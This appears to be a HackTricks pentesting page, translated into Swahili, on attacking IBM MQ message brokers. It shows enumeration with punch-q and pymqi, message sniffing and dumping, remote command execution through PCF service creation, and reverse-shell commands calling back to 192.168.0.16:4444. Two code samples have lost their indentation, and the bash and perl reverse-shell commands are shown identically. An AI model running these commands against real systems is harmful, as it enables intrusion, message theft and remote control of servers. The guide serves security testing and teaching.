1414 - Pentesting IBM MQ

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia MPANGO WA KUJIUNGA!
Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
Pata swag rasmi ya PEASS & HackTricks
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au nifuatilie kwenye Twitter 🐦@carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye repo ya hacktricks na repo ya hacktricks-cloud.

Taarifa Msingi

IBM MQ ni teknolojia ya IBM ya kusimamia foleni za ujumbe. Kama teknolojia nyingine za mawakala wa ujumbe, inalenga kupokea, kuhifadhi, kusindika na kugawa habari kati ya watengenezaji na watumiaji.

Kwa chaguo-msingi, inaweka wazi bandari ya IBM MQ TCP 1414. Marafiki, API ya REST ya HTTP inaweza pia kuwekwa wazi kwenye bandari ya 9443. Vipimo (Prometheus) vinaweza pia kupatikana kupitia bandari ya TCP 9157.

Bandari ya IBM MQ TCP 1414 inaweza kutumika kudhibiti ujumbe, foleni, njia za mawasiliano, ... lakini pia kudhibiti kifaa.

IBM inatoa nyaraka za kiufundi zinazopatikana kwenye https://www.ibm.com/docs/en/ibm-mq.

Zana

Zana iliyopendekezwa kwa udanganyifu rahisi ni punch-q, na matumizi ya Docker. Zana hiyo inatumia kwa sasa maktaba ya Python pymqi.

Kwa njia ya mwongozo zaidi, tumia maktaba ya Python pymqi. IBM MQ dependencies inahitajika.

Kuweka pymqi

IBM MQ dependencies inahitaji kuwekwa na kupakia:

Unda akaunti (IBMid) kwenye https://login.ibm.com/.
Pakua maktaba za IBM MQ kutoka https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc. Kwa Linux x86_64 ni 9.0.0.4-IBM-MQC-LinuxX64.tar.gz.
Fungua (tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz).
Chalaza sudo ./mqlicense.sh ili kukubali masharti ya leseni.

Ikiwa uko chini ya Kali Linux, badilisha faili ya mqlicense.sh: ondoa/tafuta mistari ifuatayo (kati ya mistari 105-110):
if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
 then
   echo "ERROR: This package is incompatible with this system"
   echo "       This package was built for ${BUILD_PLATFORM}"
   exit 1
fi

Weka pakiti hizi:

sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm

Kisha, ongeza muda mfupi faili za .so kwa LD: export LD_LIBRARY_PATH=/opt/mqm/lib64, kabla ya kuendesha zana nyingine zinazotumia tegemezi hizi.

Kisha, unaweza kuzalisha mradi pymqi: una vipande vya kuvutia vya nambari, kudumu, ... Au unaweza moja kwa moja kusakinisha maktaba na: pip install pymqi.

Kutumia punch-q

Kwa kutumia Docker

Tumia tu: sudo docker run --rm -ti leonjza/punch-q.

Bila kutumia Docker

Zalisha mradi punch-q kisha fuata maelezo ya kusakinisha (pip install -r requirements.txt && python3 setup.py install).

Baadaye, inaweza kutumika na amri punch-q.

Uchunguzi

Unaweza kujaribu kutambua jina la meneja wa foleni, watumiaji, njia za mawasiliano na foleni na punch-q au pymqi.

Meneja wa Foleni

Marafiki, mara nyingi hakuna kinga dhidi ya kupata jina la Meneja wa Foleni:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR

Vituo

punch-q inatumia orodha ya maneno ya ndani (inayoweza kubadilishwa) ili kupata vituo vilivyopo. Mfano wa matumizi:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.

Inatokea kwamba baadhi ya mifano ya IBM MQ inakubali ombi la MQ lisilo na uthibitisho, kwa hivyo --username / --password haihitajiki. Bila shaka, haki za ufikiaji zinaweza kutofautiana.

Marafiki tunapopata jina la kituo kimoja (hapa: DEV.ADMIN.SVRCONN), tunaweza kutambaza vituo vyote vingine.

Utaratibu wa kutambaza unaweza kufanywa kimsingi na kifungu hiki cha nambari code/examples/dis_channels.py kutoka kwa pymqi:

import logging
import pymqi

logging.basicConfig(level=logging.INFO)

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

prefix = '*'

args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
logging.info('No channels matched prefix `%s`' % prefix)
else:
raise
else:
for channel_info in response:
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
logging.info('Found channel `%s`' % channel_name)

qmgr.disconnect()

... Lakini punch-q pia inajumuisha sehemu hiyo (na habari zaidi!). Inaweza kuzinduliwa kwa kutumia:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...

| Name                 | Type              | MCA UID | Conn Name | Xmit Queue | Description     | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN    | Server-connection |         |           |            |                 |            |
| DEV.APP.SVRCONN      | Server-connection | app     |           |            |                 |            |
| SYSTEM.AUTO.RECEIVER | Receiver          |         |           |            | Auto-defined by |            |
| SYSTEM.AUTO.SVRCONN  | Server-connection |         |           |            | Auto-defined by |            |
| SYSTEM.DEF.AMQP      | AMQP              |         |           |            |                 |            |
| SYSTEM.DEF.CLUSRCVR  | Cluster-receiver  |         |           |            |                 |            |
| SYSTEM.DEF.CLUSSDR   | Cluster-sender    |         |           |            |                 |            |
| SYSTEM.DEF.RECEIVER  | Receiver          |         |           |            |                 |            |
| SYSTEM.DEF.REQUESTER | Requester         |         |           |            |                 |            |
| SYSTEM.DEF.SENDER    | Sender            |         |           |            |                 |            |
| SYSTEM.DEF.SERVER    | Server            |         |           |            |                 |            |
| SYSTEM.DEF.SVRCONN   | Server-connection |         |           |            |                 |            |
| SYSTEM.DEF.CLNTCONN  | Client-connection |         |           |            |                 |            |

Safu za Kusubiri

Kuna kipande cha nambari na pymqi (dis_queues.py) lakini punch-q inaruhusu kupata vipande zaidi vya habari kuhusu safu za kusubiri:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
| Created   | Name                 | Type   | Usage   | Depth  | Rmt. QM | Rmt. Qu | Description                       |
|           |                      |        |         |        | GR Name | eue Nam |                                   |
|           |                      |        |         |        |         | e       |                                   |
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 | E                    |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.1          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.2          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.3          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
# Truncated

Kutumia

Kuvuja ujumbe

Unaweza kulenga foleni / kituo ili kuvuta / kuvuja ujumbe kutoka kwao (operesheni isiyoharibu). Mifano:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump

Usisite kufanya mzunguko kwenye foleni zote zilizotambuliwa.

Utekelezaji wa Kanuni

Baadhi ya maelezo kabla ya kuendelea: IBM MQ inaweza kudhibitiwa kupitia njia mbalimbali: MQSC, PCF, Amri ya Kudhibiti. Orodha za jumla zinaweza kupatikana katika nyaraka za IBM MQ. PCF (Programmable Command Formats) ndio tunayolenga kuwasiliana kijijini na kifaa. punch-q na zaidi pymqi zinategemea mwingiliano wa PCF.
Unaweza kupata orodha ya amri za PCF:
Kutoka kwa nyaraka za PCF, na
kutoka kwa kiasi.
Amri moja ya kuvutia ni MQCMD_CREATE_SERVICE na nyaraka zake zinapatikana hapa. Inachukua hoja ya StartCommand inayoelekeza kwenye programu ya ndani kwenye kifaa (mfano: /bin/sh).
Pia kuna onyo la amri katika nyaraka: "Tahadhari: Amri hii inaruhusu mtumiaji kutekeleza amri isiyojulikana na mamlaka ya mqm. Ikiwa haki za kutumia amri hii zinatolewa, mtumiaji mwenye nia mbaya au asiyeangalifu anaweza kufafanua huduma ambayo inaharibu mifumo au data yako, kwa mfano, kwa kufuta faili muhimu."
Kumbuka: kulingana na nyaraka za IBM MQ (Marejeleo ya Utawala), pia kuna kiungo cha HTTP kwenye /admin/action/qmgr/{qmgrName}/mqsc ili kutekeleza amri sawa na MQSC kwa uundaji wa huduma (DEFINE SERVICE). Jambo hili halijashughulikiwa bado hapa.

Uundaji / kufuta huduma kwa kutumia PCF kwa utekelezaji wa programu kijijini unaweza kufanywa na punch-q:

Mfano 1

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"

Katika magogo ya IBM MQ, unaweza kusoma kwamba amri imefanikiwa kutekelezwa:
2023-10-10T19:13:01.713Z AMQ5030I: Amri '808544aa7fc94c48' imeanza. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]

Unaweza pia kutambaza programu zilizopo kwenye kifaa (hapa /bin/doesnotexist ... haipo):

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436

Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done

Tafadhali kumbuka kuwa uzinduzi wa programu ni usiohusiana. Kwa hivyo, unahitaji kitu cha pili ili kutumia udhaifu (msikilizaji wa kurejesha kichwa cha pembeni, uundaji wa faili kwenye huduma tofauti, utoaji wa data kupitia mtandao...)

Mfano 2

Kwa kichwa cha pembeni cha urahisi, punch-q pia inatoa mizigo miwili ya kichwa cha pembeni cha kurudisha:

Moja na bash
Moja na perl

Bila shaka unaweza kujenga moja desturi na amri ya execute.

Kwa bash:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444

Kwa perl:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444

Custom PCF

Unaweza kuchunguza nyaraka za IBM MQ na kutumia moja kwa moja maktaba ya python ya pymqi ili kujaribu amri maalum ya PCF ambayo haijatekelezwa katika punch-q.

Mfano:

import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
# Replace here with your custom PCF args and command
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
args = {pymqi.CMQCFC.xxxxx: "value"}
response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
print("Error")
else:
# Process response

qmgr.disconnect()

Ikiwa huwezi kupata majina ya kudumu, unaweza kurejelea nyaraka za IBM MQ.

Mfano wa MQCMD_REFRESH_CLUSTER (Decimal = 73). Inahitaji parameter MQCA_CLUSTER_NAME (Decimal = 2029) ambayo inaweza kuwa * (Doc: ):

import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
    args = {2029: "*"}
    response = pcf.MQCMD_REFRESH_CLUSTER(args)
except pymqi.MQMIError as e:
    print("Error")
else:
    print(response)

qmgr.disconnect()

Mazingira ya majaribio

Ikiwa unataka kujaribu tabia na udhaifu wa IBM MQ, unaweza kuweka mazingira ya ndani kulingana na Docker:

Kuwa na akaunti kwenye ibm.com na cloud.ibm.com.
Unda IBM MQ iliyowekwa kwenye kontena na:

sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2

Kwa chaguo-msingi, uthibitishaji umewezeshwa, jina la mtumiaji ni admin na nenosiri ni passw0rd (Mazingira ya kipengele MQ_ADMIN_PASSWORD). Hapa, jina la meneja wa foleni limewekwa kuwa MYQUEUEMGR (kipengele MQ_QMGR_NAME).

Unapaswa kuwa na IBM MQ imezinduliwa na kuendesha na bandari zake zimefunguliwa:

❯ sudo docker ps
CONTAINER ID   IMAGE                                COMMAND                  CREATED         STATUS                    PORTS                                                                    NAMES
58ead165e2fd   icr.io/ibm-messaging/mq:9.3.2.0-r2   "runmqdevserver"         3 seconds ago   Up 3 seconds              0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp   testing-ibmmq

Toleo la zamani la picha za IBM MQ docker zinapatikana hapa: https://hub.docker.com/r/ibmcom/mq/.

Marejeo

Previous1098/1099/1050 - Pentesting Java RMI - RMI-IIOP Next1433 - Pentesting MSSQL - Microsoft SQL Server

Last updated 2 months ago